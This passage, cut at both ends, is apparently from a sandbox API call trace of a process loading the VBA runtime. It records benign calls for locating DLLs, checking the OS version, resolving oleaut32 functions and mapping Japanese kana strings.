Shared\\VBA\\VBA7.1\\1033\\") returned 0x0 [0029.640] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\", _SizeInBytes=0x104, _Source="VBE7INTL.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0029.640] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 75 [0029.641] CharToOemBuffA (in: lpszSrc="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", lpszDst=0x2e6b40, cchDstLength=0x4c | out: lpszDst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 1 [0029.641] _access_s (_FileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", _AccessMode=0) returned 0x0 [0029.643] strcpy_s (in: _Dst=0x2e6dc0, _DstSize=0x104, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0029.649] GetSystemDefaultLCID () returned 0x409 [0029.649] GetUserDefaultLCID () returned 0x409 [0029.649] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x2e7450, cchData=2 | out: lpLCData=".") returned 2 [0029.649] GetStockObject (i=13) returned 0x18a002e [0029.649] GetObjectA (in: h=0x18a002e, c=60, pv=0x2e73f0 | out: pv=0x2e73f0) returned 60 [0029.649] lstrcpyA (in: lpString1=0x7fee3ab0150, lpString2="Vbui6.chm" | out: lpString1="Vbui6.chm") returned="Vbui6.chm" [0029.649] lstrcpyA (in: lpString1=0x7fee3ab1470, lpString2="VbLR6.chm" | out: lpString1="VbLR6.chm") returned="VbLR6.chm" [0029.651] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 66 [0029.651] lstrcpyA (in: lpString1=0x91dc4e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" [0029.651] GetVersionExA (in: lpVersionInformation=0x2e7380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0x1, dwBuildNumber=0x0, dwPlatformId=0x43, szCSDVersion="") | out: lpVersionInformation=0x2e7380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0029.651] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="Licenses", phkResult=0x2e72a8 | out: phkResult=0x2e72a8*=0xa12) returned 0x0 [0029.652] strcpy_s (in: _Dst=0x2e72b0, _DstSize=0x80, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0029.652] strcpy_s (in: _Dst=0x2e7330, _DstSize=0xc8, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0029.652] _strrev (in: _Str="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Str="7E25578F0000-E3CB-1d11-377B-B8554088") returned="7E25578F0000-E3CB-1d11-377B-B8554088" [0029.652] RegQueryValueA (in: hKey=0xa12, lpSubKey="8804558B-B773-11d1-BC3E-0000F87552E7", lpData=0x2e7330, lpcbData=0x2e72a0 | out: lpData="\x0f}\x02\x01", lpcbData=0x2e72a0) returned 0x2 [0029.652] RegCloseKey (hKey=0xa12) returned 0x0 [0029.652] OleInitialize (pvReserved=0x0) returned 0x1 [0029.653] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0029.653] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0029.653] GetClassInfoA (in: hInstance=0x7fee36e0000, lpClassName="VBBubble", lpWndClass=0x2e73e0 | out: lpWndClass=0x2e73e0) returned 0 [0029.653] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Count") returned 0x107630 [0029.653] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_Default") returned 0x10c26a [0029.653] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Item") returned 0x107ad7 [0029.653] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Add") returned 0x1072f7 [0029.653] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Remove") returned 0x10b1cf [0029.653] GlobalAddAtomA (lpString="VBDisabled") returned 0x1af204dec132 [0029.654] RegisterClassExA (param_1=0x2e7500) returned 0x1af5034ac198 [0029.654] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1000c0fd00000152) returned 1 [0029.655] GetVersionExA (in: lpVersionInformation=0x2e72f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2e72f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0029.664] GetModuleHandleA (lpModuleName="USER32") returned 0x76fb0000 [0029.665] GetProcAddress (hModule=0x76fb0000, lpProcName="GetSystemMetrics") returned 0x76fc94f0 [0029.665] GetProcAddress (hModule=0x76fb0000, lpProcName="MonitorFromWindow") returned 0x76fc5f08 [0029.665] GetProcAddress (hModule=0x76fb0000, lpProcName="MonitorFromRect") returned 0x76fc2b00 [0029.666] GetProcAddress (hModule=0x76fb0000, lpProcName="MonitorFromPoint") returned 0x76fbab64 [0029.666] GetProcAddress (hModule=0x76fb0000, lpProcName="EnumDisplayMonitors") returned 0x76fc5c30 [0029.666] GetProcAddress (hModule=0x76fb0000, lpProcName="GetMonitorInfoA") returned 0x76fba730 [0029.666] GetProcAddress (hModule=0x76fb0000, lpProcName="EnumDisplayDevicesA") returned 0x76fba5b4 [0029.666] MonitorFromWindow (hwnd=0x20202, dwFlags=0x2) returned 0x10001 [0029.666] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x2e7500 | out: lpmi=0x2e7500) returned 1 [0029.667] SetWindowPos (hWnd=0x20202, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0029.667] GetWindowThreadProcessId (in: hWnd=0x20202, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9dc [0029.667] GetVersion () returned 0x1db10106 [0029.667] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x7fefd620000 [0029.667] GetProcAddress (hModule=0x7fefd620000, lpProcName="DispCallFunc") returned 0x7fefd622270 [0029.668] GetProcAddress (hModule=0x7fefd620000, lpProcName="LoadTypeLibEx") returned 0x7fefd62a550 [0029.668] GetProcAddress (hModule=0x7fefd620000, lpProcName="UnRegisterTypeLib") returned 0x7fefd6b20d0 [0029.668] GetProcAddress (hModule=0x7fefd620000, lpProcName="CreateTypeLib2") returned 0x7fefd6adbd0 [0029.669] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDateFromUdate") returned 0x7fefd625c90 [0029.669] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarUdateFromDate") returned 0x7fefd626330 [0029.669] GetProcAddress (hModule=0x7fefd620000, lpProcName="GetAltMonthNames") returned 0x7fefd6466c0 [0029.669] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarNumFromParseNum") returned 0x7fefd624710 [0029.670] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarParseNumFromStr") returned 0x7fefd6248f0 [0029.670] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDecFromR4") returned 0x7fefd65b640 [0029.670] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDecFromR8") returned 0x7fefd65b360 [0029.671] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDecFromDate") returned 0x7fefd662640 [0029.671] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDecFromI4") returned 0x7fefd6458a0 [0029.671] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDecFromCy") returned 0x7fefd645820 [0029.671] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarR4FromDec") returned 0x7fefd65af20 [0029.672] GetProcAddress (hModule=0x7fefd620000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7fefd67a0c0 [0029.672] GetProcAddress (hModule=0x7fefd620000, lpProcName="GetRecordInfoFromGuids") returned 0x7fefd6b2160 [0029.672] GetProcAddress (hModule=0x7fefd620000, lpProcName="SafeArrayGetRecordInfo") returned 0x7fefd645af0 [0029.673] GetProcAddress (hModule=0x7fefd620000, lpProcName="SafeArraySetRecordInfo") returned 0x7fefd645a90 [0029.673] GetProcAddress (hModule=0x7fefd620000, lpProcName="SafeArrayGetIID") returned 0x7fefd645a60 [0029.673] GetProcAddress (hModule=0x7fefd620000, lpProcName="SafeArraySetIID") returned 0x7fefd645a30 [0029.674] GetProcAddress (hModule=0x7fefd620000, lpProcName="SafeArrayCopyData") returned 0x7fefd6260b0 [0029.674] GetProcAddress (hModule=0x7fefd620000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7fefd623e90 [0029.674] GetProcAddress (hModule=0x7fefd620000, lpProcName="SafeArrayCreateEx") returned 0x7fefd679f80 [0029.674] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarFormat") returned 0x7fefd6a9b20 [0029.675] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarFormatDateTime") returned 0x7fefd6a9aa0 [0029.675] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarFormatNumber") returned 0x7fefd6a9990 [0029.675] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarFormatPercent") returned 0x7fefd6a9890 [0029.676] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarFormatCurrency") returned 0x7fefd6a9770 [0029.676] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarWeekdayName") returned 0x7fefd68b8d0 [0029.676] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarMonthName") returned 0x7fefd68b800 [0029.676] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarAdd") returned 0x7fefd6a48e0 [0029.677] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarAnd") returned 0x7fefd6a9470 [0029.677] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarCat") returned 0x7fefd6a96a0 [0029.677] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDiv") returned 0x7fefd6a2fe0 [0029.678] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarEqv") returned 0x7fefd6a9cf0 [0029.678] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarIdiv") returned 0x7fefd6a8ff0 [0029.678] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarImp") returned 0x7fefd6a9c00 [0029.678] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarMod") returned 0x7fefd6a8e60 [0029.679] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarMul") returned 0x7fefd6a3690 [0029.679] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarOr") returned 0x7fefd6a92d0 [0029.679] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarPow") returned 0x7fefd6a2e80 [0029.680] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarSub") returned 0x7fefd6a3f90 [0029.680] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarXor") returned 0x7fefd6a91a0 [0029.680] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarAbs") returned 0x7fefd687c30 [0029.680] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarFix") returned 0x7fefd687a60 [0029.681] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarInt") returned 0x7fefd687890 [0029.681] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarNeg") returned 0x7fefd687ea0 [0029.681] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarNot") returned 0x7fefd6a9600 [0029.682] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarRound") returned 0x7fefd6876a0 [0029.682] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarCmp") returned 0x7fefd6a83f0 [0029.682] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDecAdd") returned 0x7fefd653070 [0029.682] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarDecCmp") returned 0x7fefd65d700 [0029.683] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarBstrCat") returned 0x7fefd65d890 [0029.683] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarCyMulI4") returned 0x7fefd63caf0 [0029.684] GetProcAddress (hModule=0x7fefd620000, lpProcName="VarBstrCmp") returned 0x7fefd648a00 [0029.684] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefde40000 [0029.684] GetProcAddress (hModule=0x7fefde40000, lpProcName="CoCreateInstanceEx") returned 0x7fefde4de90 [0029.684] GetProcAddress (hModule=0x7fefde40000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefde5a4c4 [0029.685] GetSystemMetrics (nIndex=42) returned 0 [0029.685] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7fee3aa55d0 | out: ppMalloc=0x7fee3aa55d0*=0x7fefe015380) returned 0x0 [0029.685] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766fe40 [0029.685] GetUserDefaultLCID () returned 0x409 [0029.685] GetUserDefaultLCID () returned 0x409 [0029.685] IsValidCodePage (CodePage=0x3a4) returned 1 [0029.690] IsValidCodePage (CodePage=0x3b5) returned 1 [0029.691] IsValidCodePage (CodePage=0x3b6) returned 1 [0029.692] IsValidCodePage (CodePage=0x3a8) returned 1 [0029.692] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="぀", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぁ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="あ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぃ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="い", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="う", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぇ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="え", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぉ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="お", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="か", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.693] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="が", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.702] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="き", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.702] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぎ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.702] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="く", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.702] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぐ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.702] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="け", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="げ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="こ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ご", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="さ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ざ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="し", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="じ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="す", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ず", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="せ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぜ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="そ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぞ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="た", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="だ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ち", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぢ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="っ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="つ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="づ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="て", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="で", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="と", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ど", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="な", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="に", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぬ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ね", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="の", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="は", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ば", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぱ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ひ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="び", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ふ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぶ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぷ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="へ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="べ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぺ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ほ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぼ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぽ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ま", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="み", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="む", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="め", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="も", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゃ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.703] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="や", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゆ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ょ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="よ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ら", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="り", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="る", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="れ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ろ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゎ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="わ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゐ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゑ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="を", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.704] LCMapStringW (in: Locale=0x411, 